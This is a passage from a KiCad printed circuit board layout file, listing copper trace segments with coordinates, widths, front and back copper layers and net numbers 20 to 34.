(segment (start 172 34.4) (end 169.958499 36.441501) (width 0.254) (layer B.Cu) (net 20) (status 10))
(segment (start 169.958499 70.358499) (end 172 72.4) (width 0.254) (layer B.Cu) (net 20) (status 20))
(segment (start 169.958499 55.441501) (end 169.958499 70.358499) (width 0.254) (layer B.Cu) (net 20))
(segment (start 172 53.4) (end 169.958499 55.441501) (width 0.254) (layer B.Cu) (net 20) (status 10))
(segment (start 165.041501 93.184493) (end 164.527032 93.698962) (width 0.254) (layer B.Cu) (net 20) (status 30))
(segment (start 165.041501 79.358499) (end 165.041501 93.184493) (width 0.254) (layer B.Cu) (net 20) (status 20))
(segment (start 172 72.4) (end 165.041501 79.358499) (width 0.254) (layer B.Cu) (net 20) (status 10))
(segment (start 152.355359 73.556999) (end 151.656999 74.255359) (width 0.254) (layer F.Cu) (net 20))
(segment (start 170.654425 72.4) (end 172 72.4) (width 0.254) (layer F.Cu) (net 20) (status 20))
(segment (start 169.497426 73.556999) (end 170.654425 72.4) (width 0.254) (layer F.Cu) (net 20))
(segment (start 152.355359 73.556999) (end 169.497426 73.556999) (width 0.254) (layer F.Cu) (net 20))
(segment (start 150.407327 75.505031) (end 152.355359 73.556999) (width 0.254) (layer F.Cu) (net 20))
(segment (start 146.791187 75.505031) (end 150.407327 75.505031) (width 0.254) (layer F.Cu) (net 20))
(segment (start 143.58003 72.293874) (end 146.791187 75.505031) (width 0.254) (layer F.Cu) (net 20))
(segment (start 143.425 65.505) (end 143.58003 65.66003) (width 0.254) (layer F.Cu) (net 20))
(segment (start 143.58003 65.66003) (end 143.58003 72.293874) (width 0.254) (layer F.Cu) (net 20))
(segment (start 141.32 65.505) (end 143.425 65.505) (width 0.254) (layer F.Cu) (net 20) (status 10))
(segment (start 188.958499 45.858499) (end 191 47.9) (width 0.254) (layer B.Cu) (net 21) (status 20))
(segment (start 188.958499 30.941501) (end 188.958499 45.858499) (width 0.254) (layer B.Cu) (net 21))
(segment (start 191 28.9) (end 188.958499 30.941501) (width 0.254) (layer B.Cu) (net 21) (status 10))
(segment (start 188.958499 64.858499) (end 191 66.9) (width 0.254) (layer B.Cu) (net 21) (status 20))
(segment (start 188.958499 49.941501) (end 188.958499 64.858499) (width 0.254) (layer B.Cu) (net 21))
(segment (start 191 47.9) (end 188.958499 49.941501) (width 0.254) (layer B.Cu) (net 21) (status 10))
(segment (start 152.107011 73.102989) (end 151.065 74.145) (width 0.254) (layer F.Cu) (net 21))
(segment (start 151.065 74.145) (end 150.88 74.33) (width 0.254) (layer F.Cu) (net 21))
(segment (start 170.656999 71.755359) (end 171.355359 71.056999) (width 0.254) (layer F.Cu) (net 21))
(segment (start 169.309369 73.102989) (end 171.355359 71.056999) (width 0.254) (layer F.Cu) (net 21))
(segment (start 152.107011 73.102989) (end 169.309369 73.102989) (width 0.254) (layer F.Cu) (net 21))
(segment (start 189.654424 66.9) (end 191 66.9) (width 0.254) (layer F.Cu) (net 21) (status 20))
(segment (start 185.497425 71.056999) (end 189.654424 66.9) (width 0.254) (layer F.Cu) (net 21))
(segment (start 171.355359 71.056999) (end 185.497425 71.056999) (width 0.254) (layer F.Cu) (net 21))
(segment (start 150.158981 75.051021) (end 151.065 74.145) (width 0.254) (layer F.Cu) (net 21))
(segment (start 146.979245 75.051021) (end 150.158981 75.051021) (width 0.254) (layer F.Cu) (net 21))
(segment (start 144.03404 72.105817) (end 146.979245 75.051021) (width 0.254) (layer F.Cu) (net 21))
(segment (start 144.03404 64.39404) (end 144.03404 72.105817) (width 0.254) (layer F.Cu) (net 21))
(segment (start 143.875 64.235) (end 144.03404 64.39404) (width 0.254) (layer F.Cu) (net 21))
(segment (start 141.32 64.235) (end 143.875 64.235) (width 0.254) (layer F.Cu) (net 21) (status 10))
(segment (start 42.01 81.79) (end 42 81.8) (width 0.254) (layer F.Cu) (net 22) (tstamp 5EDCC251) (status 30))
(segment (start 42.01 78.86) (end 42.01 81.79) (width 0.254) (layer F.Cu) (net 22) (tstamp 5EDCC61A) (status 30))
(segment (start 42 81.8) (end 42 81.11) (width 0.254) (layer F.Cu) (net 22) (tstamp 5EDCC320) (status 10))
(segment (start 58.91 80.69) (end 58.8 80.8) (width 0.254) (layer F.Cu) (net 22) (tstamp 5EDCC60E) (status 30))
(segment (start 59.897999 80.515603) (end 59.613602 80.8) (width 0.254) (layer F.Cu) (net 22))
(segment (start 59.897999 78.647999) (end 59.897999 80.515603) (width 0.254) (layer F.Cu) (net 22))
(segment (start 55.64198 74.39198) (end 59.897999 78.647999) (width 0.254) (layer F.Cu) (net 22))
(segment (start 59.613602 80.8) (end 58.8 80.8) (width 0.254) (layer F.Cu) (net 22) (status 20))
(segment (start 47.796151 74.39198) (end 55.64198 74.39198) (width 0.254) (layer F.Cu) (net 22))
(segment (start 44.355142 77.83299) (end 47.796151 74.39198) (width 0.254) (layer F.Cu) (net 22))
(segment (start 43.03701 77.83299) (end 44.355142 77.83299) (width 0.254) (layer F.Cu) (net 22))
(segment (start 42.01 78.86) (end 43.03701 77.83299) (width 0.254) (layer F.Cu) (net 22) (status 10))
(segment (start 68.69 89.89) (end 68.5 89.7) (width 0.254) (layer F.Cu) (net 23) (tstamp 5EDCC36E) (status 30))
(segment (start 72.705 89.7) (end 72.875 89.87) (width 0.254) (layer F.Cu) (net 23) (status 30))
(segment (start 68.5 89.7) (end 72.705 89.7) (width 0.254) (layer F.Cu) (net 23) (status 30))
(segment (start 226.958499 63.858499) (end 229 65.9) (width 0.254) (layer B.Cu) (net 24) (status 20))
(segment (start 226.958499 48.941501) (end 226.958499 63.858499) (width 0.254) (layer B.Cu) (net 24))
(segment (start 229 46.9) (end 226.958499 48.941501) (width 0.254) (layer B.Cu) (net 24) (status 10))
(segment (start 226.958499 82.858499) (end 229 84.9) (width 0.254) (layer B.Cu) (net 24) (status 20))
(segment (start 226.958499 67.941501) (end 226.958499 82.858499) (width 0.254) (layer B.Cu) (net 24))
(segment (start 229 65.9) (end 226.958499 67.941501) (width 0.254) (layer B.Cu) (net 24) (status 10))
(segment (start 229 84.9) (end 224.112358 84.9) (width 0.254) (layer F.Cu) (net 24) (status 10))
(segment (start 224.112358 84.9) (end 210.769357 71.556999) (width 0.254) (layer F.Cu) (net 24))
(segment (start 170.979245 70.14898) (end 168.933256 72.194969) (width 0.254) (layer F.Cu) (net 24))
(segment (start 190.167302 65.102989) (end 185.121312 70.14898) (width 0.254) (layer F.Cu) (net 24))
(segment (start 210.769357 71.556999) (end 209.355359 71.556999) (width 0.254) (layer F.Cu) (net 24))
(segment (start 204.055989 72.44599) (end 196.712989 65.10299) (width 0.254) (layer F.Cu) (net 24))
(segment (start 209.355359 71.556999) (end 208.466368 72.44599) (width 0.254) (layer F.Cu) (net 24))
(segment (start 196.712989 65.10299) (end 190.167302 65.102989) (width 0.254) (layer F.Cu) (net 24))
(segment (start 208.466368 72.44599) (end 204.055989 72.44599) (width 0.254) (layer F.Cu) (net 24))
(segment (start 185.121312 70.14898) (end 170.979245 70.14898) (width 0.254) (layer F.Cu) (net 24))
(segment (start 168.933256 72.194969) (end 151.730899 72.194969) (width 0.254) (layer F.Cu) (net 24))
(segment (start 151.730899 72.194969) (end 149.782867 74.143001) (width 0.254) (layer F.Cu) (net 24))
(segment (start 147.373001 74.143001) (end 144.94206 71.71206) (width 0.254) (layer F.Cu) (net 24))
(segment (start 147.993001 74.143001) (end 147.373001 74.143001) (width 0.254) (layer F.Cu) (net 24))
(segment (start 149.782867 74.143001) (end 147.993001 74.143001) (width 0.254) (layer F.Cu) (net 24))
(segment (start 147.355359 74.143001) (end 147.993001 74.143001) (width 0.254) (layer F.Cu) (net 24))
(segment (start 144.94206 61.79206) (end 144.845 61.695) (width 0.254) (layer F.Cu) (net 24))
(segment (start 144.845 61.695) (end 141.32 61.695) (width 0.254) (layer F.Cu) (net 24) (status 20))
(segment (start 144.94206 71.68206) (end 144.94206 61.79206) (width 0.254) (layer F.Cu) (net 24))
(segment (start 42.722999 23.322999) (end 43.65 24.25) (width 0.254) (layer F.Cu) (net 25) (status 20))
(segment (start 37.577001 23.322999) (end 42.722999 23.322999) (width 0.254) (layer F.Cu) (net 25))
(segment (start 24.65 36.25) (end 37.577001 23.322999) (width 0.254) (layer F.Cu) (net 25) (status 10))
(segment (start 61.722999 17.322999) (end 62.65 18.25) (width 0.254) (layer F.Cu) (net 25) (status 20))
(segment (start 50.577001 17.322999) (end 61.722999 17.322999) (width 0.254) (layer F.Cu) (net 25))
(segment (start 43.65 24.25) (end 50.577001 17.322999) (width 0.254) (layer F.Cu) (net 25) (status 10))
(segment (start 75.877699 17.977699) (end 81.65 23.75) (width 0.254) (layer F.Cu) (net 25) (status 20))
(segment (start 62.922301 17.977699) (end 75.877699 17.977699) (width 0.254) (layer F.Cu) (net 25) (status 10))
(segment (start 62.65 18.25) (end 62.922301 17.977699) (width 0.254) (layer F.Cu) (net 25) (status 30))
(segment (start 97.877699 23.477699) (end 100.65 26.25) (width 0.254) (layer F.Cu) (net 25) (status 20))
(segment (start 81.922301 23.477699) (end 97.877699 23.477699) (width 0.254) (layer F.Cu) (net 25) (status 10))
(segment (start 81.65 23.75) (end 81.922301 23.477699) (width 0.254) (layer F.Cu) (net 25) (status 30))
(segment (start 23.418989 73.511011) (end 23.418989 73.151011) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.418989 75.118989) (end 23.41899 75.299658) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.418989 75.299658) (end 23.418989 75.118989) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.418989 75.118989) (end 23.418989 73.511011) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.41899 73.200342) (end 23.418989 73.511011) (width 0.254) (layer F.Cu) (net 25))
(segment (start 25.041501 71.577831) (end 23.41899 73.200342) (width 0.254) (layer F.Cu) (net 25))
(segment (start 25.041501 59.020079) (end 25.041501 71.577831) (width 0.254) (layer F.Cu) (net 25))
(segment (start 24.19599 58.174568) (end 25.041501 59.020079) (width 0.254) (layer F.Cu) (net 25))
(segment (start 24.19599 56.38599) (end 24.19599 58.174568) (width 0.254) (layer F.Cu) (net 25))
(segment (start 24.08 56.27) (end 24.19599 56.38599) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.872999 48.014643) (end 23.872999 56.111601) (width 0.254) (layer F.Cu) (net 25))
(segment (start 25.041501 46.846141) (end 23.872999 48.014643) (width 0.254) (layer F.Cu) (net 25))
(segment (start 25.041501 36.641501) (end 25.041501 46.846141) (width 0.254) (layer F.Cu) (net 25) (status 10))
(segment (start 24.031398 56.27) (end 24.08 56.27) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.872999 56.111601) (end 24.031398 56.27) (width 0.254) (layer F.Cu) (net 25))
(segment (start 24.65 36.25) (end 25.041501 36.641501) (width 0.254) (layer F.Cu) (net 25) (status 30))
(segment (start 60.5 78.3) (end 60.192067 78.3) (width 0.254) (layer F.Cu) (net 25) (status 10))
(segment (start 60.192067 78.3) (end 56.376033 74.483967) (width 0.254) (layer F.Cu) (net 25))
(segment (start 56.376033 74.483967) (end 55.830037 73.93797) (width 0.254) (layer F.Cu) (net 25))
(segment (start 55.830037 73.93797) (end 48.25203 73.93797) (width 0.254) (layer F.Cu) (net 25))
(segment (start 48.25203 73.93797) (end 47.608094 73.93797) (width 0.254) (layer F.Cu) (net 25))
(segment (start 48.25203 73.93797) (end 47.96 73.93797) (width 0.254) (layer F.Cu) (net 25))
(segment (start 24.64965 76.53032) (end 23.924665 75.805335) (width 0.254) (layer F.Cu) (net 25))
(segment (start 45.015744 76.53032) (end 24.64965 76.53032) (width 0.254) (layer F.Cu) (net 25))
(segment (start 47.608094 73.93797) (end 45.015744 76.53032) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.924665 75.805335) (end 24.649652 76.530321) (width 0.254) (layer F.Cu) (net 25))
(segment (start 23.41899 75.299658) (end 23.924665 75.805335) (width 0.254) (layer F.Cu) (net 25))
(segment (start 172.722999 22.822999) (end 173.65 23.75) (width 0.254) (layer F.Cu) (net 26) (status 20))
(segment (start 158.077001 22.822999) (end 172.722999 22.822999) (width 0.254) (layer F.Cu) (net 26))
(segment (start 154.65 26.25) (end 158.077001 22.822999) (width 0.254) (layer F.Cu) (net 26) (status 10))
(segment (start 205.377699 17.977699) (end 211.65 24.25) (width 0.254) (layer F.Cu) (net 26) (status 20))
(segment (start 192.922301 17.977699) (end 205.377699 17.977699) (width 0.254) (layer F.Cu) (net 26) (status 10))
(segment (start 192.65 18.25) (end 192.922301 17.977699) (width 0.254) (layer F.Cu) (net 26) (status 30))
(segment (start 218.377699 23.977699) (end 230.65 36.25) (width 0.254) (layer F.Cu) (net 26) (status 20))
(segment (start 211.922301 23.977699) (end 218.377699 23.977699) (width 0.254) (layer F.Cu) (net 26) (status 10))
(segment (start 211.65 24.25) (end 211.922301 23.977699) (width 0.254) (layer F.Cu) (net 26) (status 30))
(segment (start 191.722999 17.322999) (end 192.65 18.25) (width 0.254) (layer F.Cu) (net 26) (status 20))
(segment (start 180.077001 17.322999) (end 191.722999 17.322999) (width 0.254) (layer F.Cu) (net 26))
(segment (start 173.65 23.75) (end 180.077001 17.322999) (width 0.254) (layer F.Cu) (net 26) (status 10))
(segment (start 155.041501 43.219897) (end 155.041501 26.641501) (width 0.254) (layer F.Cu) (net 26) (status 20))
(segment (start 155.041501 26.641501) (end 154.65 26.25) (width 0.254) (layer F.Cu) (net 26) (status 30))
(segment (start 152.061601 46.177001) (end 152.14 46.098602) (width 0.254) (layer F.Cu) (net 26))
(segment (start 153.465407 44.795991) (end 154.205699 44.055699) (width 0.254) (layer F.Cu) (net 26))
(segment (start 153.442612 44.795991) (end 153.465407 44.795991) (width 0.254) (layer F.Cu) (net 26))
(segment (start 152.061601 46.177001) (end 153.442612 44.795991) (width 0.254) (layer F.Cu) (net 26))
(segment (start 154.205699 44.055699) (end 155.041501 43.219897) (width 0.254) (layer F.Cu) (net 26))
(segment (start 153.872999 44.388399) (end 154.205699 44.055699) (width 0.254) (layer F.Cu) (net 26))
(segment (start 132.64701 58.51201) (end 132.02 57.885) (width 0.254) (layer F.Cu) (net 26) (status 20))
(segment (start 145.215924 58.51201) (end 132.64701 58.51201) (width 0.254) (layer F.Cu) (net 26))
(segment (start 149.470009 54.257925) (end 145.215924 58.51201) (width 0.254) (layer F.Cu) (net 26))
(segment (start 149.470009 47.772057) (end 149.470009 54.257925) (width 0.254) (layer F.Cu) (net 26))
(segment (start 149.487943 47.772057) (end 149.470009 47.772057) (width 0.254) (layer F.Cu) (net 26))
(segment (start 151.082999 46.177001) (end 149.487943 47.772057) (width 0.254) (layer F.Cu) (net 26))
(segment (start 152.061601 46.177001) (end 151.082999 46.177001) (width 0.254) (layer F.Cu) (net 26))
(segment (start 172.722999 41.822999) (end 173.65 42.75) (width 0.254) (layer F.Cu) (net 27) (status 20))
(segment (start 158.077001 41.822999) (end 172.722999 41.822999) (width 0.254) (layer F.Cu) (net 27))
(segment (start 154.65 45.25) (end 158.077001 41.822999) (width 0.254) (layer F.Cu) (net 27) (status 10))
(segment (start 191.722999 36.322999) (end 192.65 37.25) (width 0.254) (layer F.Cu) (net 27) (status 20))
(segment (start 180.077001 36.322999) (end 191.722999 36.322999) (width 0.254) (layer F.Cu) (net 27))
(segment (start 173.65 42.75) (end 180.077001 36.322999) (width 0.254) (layer F.Cu) (net 27) (status 10))
(segment (start 205.377699 36.977699) (end 211.65 43.25) (width 0.254) (layer F.Cu) (net 27) (status 20))
(segment (start 192.922301 36.977699) (end 205.377699 36.977699) (width 0.254) (layer F.Cu) (net 27) (status 10))
(segment (start 192.65 37.25) (end 192.922301 36.977699) (width 0.254) (layer F.Cu) (net 27) (status 30))
(segment (start 218.377699 42.977699) (end 230.65 55.25) (width 0.254) (layer F.Cu) (net 27) (status 20))
(segment (start 211.922301 42.977699) (end 218.377699 42.977699) (width 0.254) (layer F.Cu) (net 27) (status 10))
(segment (start 211.65 43.25) (end 211.922301 42.977699) (width 0.254) (layer F.Cu) (net 27) (status 30))
(segment (start 153.630669 45.25) (end 154.65 45.25) (width 0.254) (layer F.Cu) (net 27) (status 20))
(segment (start 152.249658 46.631011) (end 153.630669 45.25) (width 0.254) (layer F.Cu) (net 27))
(segment (start 151.271055 46.631011) (end 152.249658 46.631011) (width 0.254) (layer F.Cu) (net 27))
(segment (start 149.924019 47.978047) (end 151.271055 46.631011) (width 0.254) (layer F.Cu) (net 27))
(segment (start 144.58799 59.78201) (end 149.924019 54.445981) (width 0.254) (layer F.Cu) (net 27))
(segment (start 132.64701 59.78201) (end 144.58799 59.78201) (width 0.254) (layer F.Cu) (net 27))
(segment (start 149.924019 54.445981) (end 149.924019 47.978047) (width 0.254) (layer F.Cu) (net 27))
(segment (start 132.02 59.155) (end 132.64701 59.78201) (width 0.254) (layer F.Cu) (net 27) (status 10))
(segment (start 37.577001 42.322999) (end 24.65 55.25) (width 0.254) (layer F.Cu) (net 28) (status 20))
(segment (start 42.722999 42.322999) (end 37.577001 42.322999) (width 0.254) (layer F.Cu) (net 28))
(segment (start 43.65 43.25) (end 42.722999 42.322999) (width 0.254) (layer F.Cu) (net 28) (status 10))
(segment (start 61.722999 36.322999) (end 62.65 37.25) (width 0.254) (layer F.Cu) (net 28) (status 20))
(segment (start 50.577001 36.322999) (end 61.722999 36.322999) (width 0.254) (layer F.Cu) (net 28))
(segment (start 43.65 43.25) (end 50.577001 36.322999) (width 0.254) (layer F.Cu) (net 28) (status 10))
(segment (start 75.877699 36.977699) (end 81.65 42.75) (width 0.254) (layer F.Cu) (net 28) (status 20))
(segment (start 62.922301 36.977699) (end 75.877699 36.977699) (width 0.254) (layer F.Cu) (net 28) (status 10))
(segment (start 62.65 37.25) (end 62.922301 36.977699) (width 0.254) (layer F.Cu) (net 28) (status 30))
(segment (start 97.877699 42.477699) (end 100.65 45.25) (width 0.254) (layer F.Cu) (net 28) (status 20))
(segment (start 81.922301 42.477699) (end 97.877699 42.477699) (width 0.254) (layer F.Cu) (net 28) (status 10))
(segment (start 81.65 42.75) (end 81.922301 42.477699) (width 0.254) (layer F.Cu) (net 28) (status 30))
(segment (start 25.041501 72.219897) (end 23.872999 73.388399) (width 0.254) (layer F.Cu) (net 28))
(segment (start 24.260699 75.499301) (end 24.837709 76.076311) (width 0.254) (layer F.Cu) (net 28))
(segment (start 23.872999 75.111601) (end 24.260699 75.499301) (width 0.254) (layer F.Cu) (net 28))
(segment (start 24.260699 75.499301) (end 24.383699 75.622301) (width 0.254) (layer F.Cu) (net 28))
(segment (start 61.226999 77.222999) (end 61.3 77.296) (width 0.254) (layer F.Cu) (net 28) (tstamp 5EDCC37A))
(segment (start 60.065066 77.222999) (end 61.226999 77.222999) (width 0.254) (layer F.Cu) (net 28) (tstamp 5EDCC269))
(segment (start 61.3 77.296) (end 61.3 78.3) (width 0.254) (layer F.Cu) (net 28) (tstamp 5EDCC323) (status 20))
(segment (start 24.65 57.986511) (end 24.65 55.25) (width 0.254) (layer F.Cu) (net 28) (status 20))
(segment (start 61.217967 77.213967) (end 59.748099 77.213967) (width 0.254) (layer F.Cu) (net 28))
(segment (start 61.3 77.296) (end 61.217967 77.213967) (width 0.254) (layer F.Cu) (net 28))
(segment (start 47.420037 73.48396) (end 47.154084 73.749914) (width 0.254) (layer F.Cu) (net 28))
(segment (start 59.748099 77.213967) (end 56.402066 73.867934) (width 0.254) (layer F.Cu) (net 28))
(segment (start 56.018094 73.48396) (end 47.420037 73.48396) (width 0.254) (layer F.Cu) (net 28))
(segment (start 56.402066 73.867934) (end 56.018094 73.48396) (width 0.254) (layer F.Cu) (net 28))
(segment (start 25.495511 58.832022) (end 24.65 57.986511) (width 0.254) (layer F.Cu) (net 28))
(segment (start 23.872999 73.388399) (end 25.495511 71.765888) (width 0.254) (layer F.Cu) (net 28))
(segment (start 23.872999 75.111601) (end 23.872999 73.388399) (width 0.254) (layer F.Cu) (net 28))
(segment (start 25.495511 71.765888) (end 25.495511 58.832022) (width 0.254) (layer F.Cu) (net 28))
(segment (start 24.837708 76.07631) (end 23.872999 75.111601) (width 0.254) (layer F.Cu) (net 28))
(segment (start 44.827688 76.07631) (end 24.837708 76.07631) (width 0.254) (layer F.Cu) (net 28))
(segment (start 47.154084 73.749914) (end 44.827688 76.07631) (width 0.254) (layer F.Cu) (net 28))
(segment (start 42.722999 61.322999) (end 43.65 62.25) (width 0.254) (layer F.Cu) (net 29) (status 20))
(segment (start 36.723001 61.322999) (end 42.722999 61.322999) (width 0.254) (layer F.Cu) (net 29))
(segment (start 24.65 73.396) (end 36.723001 61.322999) (width 0.254) (layer F.Cu) (net 29))
(segment (start 24.65 74.25) (end 24.65 73.396) (width 0.254) (layer F.Cu) (net 29) (status 10))
(segment (start 61.722999 55.322999) (end 62.65 56.25) (width 0.254) (layer F.Cu) (net 29) (status 20))
(segment (start 50.577001 55.322999) (end 61.722999 55.322999) (width 0.254) (layer F.Cu) (net 29))
(segment (start 43.65 62.25) (end 50.577001 55.322999) (width 0.254) (layer F.Cu) (net 29) (status 10))
(segment (start 75.877699 55.977699) (end 81.65 61.75) (width 0.254) (layer F.Cu) (net 29) (status 20))
(segment (start 62.922301 55.977699) (end 75.877699 55.977699) (width 0.254) (layer F.Cu) (net 29) (status 10))
(segment (start 62.65 56.25) (end 62.922301 55.977699) (width 0.254) (layer F.Cu) (net 29) (status 30))
(segment (start 97.877699 61.477699) (end 100.65 64.25) (width 0.254) (layer F.Cu) (net 29) (status 20))
(segment (start 81.922301 61.477699) (end 97.877699 61.477699) (width 0.254) (layer F.Cu) (net 29) (status 10))
(segment (start 81.65 61.75) (end 81.922301 61.477699) (width 0.254) (layer F.Cu) (net 29) (status 30))
(segment (start 24.65 74.25) (end 24.65 75.104) (width 0.254) (layer F.Cu) (net 29) (status 10))
(segment (start 24.65 75.246536) (end 24.65 74.25) (width 0.254) (layer F.Cu) (net 29) (status 20))
(segment (start 44.63963 75.6223) (end 25.025764 75.6223) (width 0.254) (layer F.Cu) (net 29))
(segment (start 47.23198 73.02995) (end 44.63963 75.6223) (width 0.254) (layer F.Cu) (net 29))
(segment (start 56.206151 73.02995) (end 47.23198 73.02995) (width 0.254) (layer F.Cu) (net 29))
(segment (start 59.712999 76.536801) (end 56.206151 73.02995) (width 0.254) (layer F.Cu) (net 29))
(segment (start 59.936155 76.759957) (end 59.712999 76.536801) (width 0.254) (layer F.Cu) (net 29))
(segment (start 61.406024 76.759957) (end 59.936155 76.759957) (width 0.254) (layer F.Cu) (net 29))
(segment (start 25.025764 75.6223) (end 24.65 75.246536) (width 0.254) (layer F.Cu) (net 29))
(segment (start 62.1 77.453933) (end 61.406024 76.759957) (width 0.254) (layer F.Cu) (net 29))
(segment (start 62.1 78.3) (end 62.1 77.453933) (width 0.254) (layer F.Cu) (net 29) (status 10))
(segment (start 113.728942 91.03218) (end 113.728942 91.725) (width 0.254) (layer F.Cu) (net 30) (status 30))
(segment (start 106.523813 83.827051) (end 113.728942 91.03218) (width 0.254) (layer F.Cu) (net 30) (status 20))
(segment (start 91.793778 83.827051) (end 106.523813 83.827051) (width 0.254) (layer F.Cu) (net 30) (status 10))
(segment (start 71.4 82.4) (end 70.2 82.4) (width 0.254) (layer F.Cu) (net 30) (tstamp 5EDCC1FD) (status 20))
(segment (start 71.99299 81.80701) (end 71.4 82.4) (width 0.254) (layer F.Cu) (net 30) (tstamp 5EDCC19D))
(segment (start 89.773737 81.80701) (end 71.99299 81.80701) (width 0.254) (layer F.Cu) (net 30) (tstamp 5EDCC24B))
(segment (start 91.793778 83.827051) (end 89.773737 81.80701) (width 0.254) (layer F.Cu) (net 30) (status 10))
(segment (start 163.174846 82.854017) (end 163.343778 83.022949) (width 0.254) (layer F.Cu) (net 31) (status 30))
(segment (start 148.57089 82.533052) (end 141.028942 90.075) (width 0.254) (layer F.Cu) (net 31) (status 20))
(segment (start 162.853881 82.533052) (end 148.57089 82.533052) (width 0.254) (layer F.Cu) (net 31) (status 10))
(segment (start 163.343778 83.022949) (end 162.853881 82.533052) (width 0.254) (layer F.Cu) (net 31) (status 30))
(segment (start 142.67201 88.431932) (end 141.028942 90.075) (width 0.254) (layer F.Cu) (net 31) (status 20))
(segment (start 142.67201 67.55603) (end 142.67201 88.431932) (width 0.254) (layer F.Cu) (net 31))
(segment (start 142.51799 67.40201) (end 142.67201 67.55603) (width 0.254) (layer F.Cu) (net 31))
(segment (start 139.95299 67.33299) (end 140.02201 67.40201) (width 0.254) (layer F.Cu) (net 31))
(segment (start 140.02201 67.40201) (end 142.51799 67.40201) (width 0.254) (layer F.Cu) (net 31))
(segment (start 139.95299 62.44299) (end 139.95299 67.33299) (width 0.254) (layer F.Cu) (net 31))
(segment (start 139.83201 62.32201) (end 139.95299 62.44299) (width 0.254) (layer F.Cu) (net 31))
(segment (start 132.64701 62.32201) (end 139.83201 62.32201) (width 0.254) (layer F.Cu) (net 31))
(segment (start 132.02 61.695) (end 132.64701 62.32201) (width 0.254) (layer F.Cu) (net 31) (status 10))
(segment (start 172.722999 60.822999) (end 173.65 61.75) (width 0.254) (layer F.Cu) (net 32) (status 20))
(segment (start 158.077001 60.822999) (end 172.722999 60.822999) (width 0.254) (layer F.Cu) (net 32))
(segment (start 154.65 64.25) (end 158.077001 60.822999) (width 0.254) (layer F.Cu) (net 32) (status 10))
(segment (start 191.722999 55.322999) (end 192.65 56.25) (width 0.254) (layer F.Cu) (net 32) (status 20))
(segment (start 180.077001 55.322999) (end 191.722999 55.322999) (width 0.254) (layer F.Cu) (net 32))
(segment (start 173.65 61.75) (end 180.077001 55.322999) (width 0.254) (layer F.Cu) (net 32) (status 10))
(segment (start 205.377699 55.977699) (end 211.65 62.25) (width 0.254) (layer F.Cu) (net 32) (status 20))
(segment (start 192.922301 55.977699) (end 205.377699 55.977699) (width 0.254) (layer F.Cu) (net 32) (status 10))
(segment (start 192.65 56.25) (end 192.922301 55.977699) (width 0.254) (layer F.Cu) (net 32) (status 30))
(segment (start 218.377699 61.977699) (end 230.65 74.25) (width 0.254) (layer F.Cu) (net 32) (status 20))
(segment (start 211.922301 61.977699) (end 218.377699 61.977699) (width 0.254) (layer F.Cu) (net 32) (status 10))
(segment (start 211.65 62.25) (end 211.922301 61.977699) (width 0.254) (layer F.Cu) (net 32) (status 30))
(segment (start 151.45201 61.05201) (end 154.65 64.25) (width 0.254) (layer F.Cu) (net 32) (status 20))
(segment (start 132.64701 61.05201) (end 151.45201 61.05201) (width 0.254) (layer F.Cu) (net 32))
(segment (start 132.02 60.425) (end 132.64701 61.05201) (width 0.254) (layer F.Cu) (net 32) (status 10))
(segment (start 133.2 76.475) (end 133.225 76.45) (width 0.381) (layer F.Cu) (net 33) (status 30))
(segment (start 133.2 78.4) (end 133.2 76.475) (width 0.381) (layer F.Cu) (net 33) (status 30))
(segment (start 133.045 68.045) (end 132.02 68.045) (width 0.381) (layer F.Cu) (net 33) (status 20))
(segment (start 134.510501 69.510501) (end 133.045 68.045) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.510501 75.164499) (end 134.510501 69.510501) (width 0.381) (layer F.Cu) (net 33))
(segment (start 133.225 76.45) (end 134.510501 75.164499) (width 0.381) (layer F.Cu) (net 33) (status 10))
(segment (start 139.375 76.45) (end 137.325 76.45) (width 0.381) (layer F.Cu) (net 33) (status 30))
(segment (start 134.30949 75.73469) (end 134.30949 77.32949) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.510501 75.533679) (end 134.30949 75.73469) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.510501 75.164499) (end 134.510501 75.533679) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.848182 77.868183) (end 134.80949 77.906875) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.30949 77.32949) (end 134.848182 77.868183) (width 0.381) (layer F.Cu) (net 33))
(segment (start 139.375 77.108635) (end 139.375 76.45) (width 0.381) (layer F.Cu) (net 33) (status 30))
(segment (start 136.893125 79.59051) (end 139.375 77.108635) (width 0.381) (layer F.Cu) (net 33) (status 20))
(segment (start 135.506875 79.59051) (end 136.893125 79.59051) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.80949 78.893125) (end 135.506875 79.59051) (width 0.381) (layer F.Cu) (net 33))
(segment (start 134.80949 77.906875) (end 134.80949 78.893125) (width 0.381) (layer F.Cu) (net 33))
(segment (start 141.59051 76.61551) (end 141.425 76.45) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 141.59051 82.70949) (end 141.59051 76.61551) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 141.3 83) (end 141.59051 82.70949) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 141.425 74.5) (end 141.32 74.395) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 141.32 74.395) (end 141.32 73.125) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 141.32 73.125) (end 141.32 71.855) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 131.175 78.258635) (end 131.175 76.45) (width 0.381) (layer F.Cu) (net 34) (status 20))
(segment (start 135.916365 83) (end 131.175 78.258635) (width 0.381) (layer F.Cu) (net 34))
(segment (start 141.3 83) (end 135.916365 83) (width 0.381) (layer F.Cu) (net 34) (status 10))
(segment (start 131.500602 69.315) (end 132.02 69.315) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 130.60449 70.211112) (end 131.500602 69.315) (width 0.381) (layer F.Cu) (net 34) (status 20))
(segment (start 130.60449 75.87949) (end 130.60449 70.211112) (width 0.381) (layer F.Cu) (net 34))
(segment (start 131.175 76.45) (end 130.60449 75.87949) (width 0.381) (layer F.Cu) (net 34) (status 10))
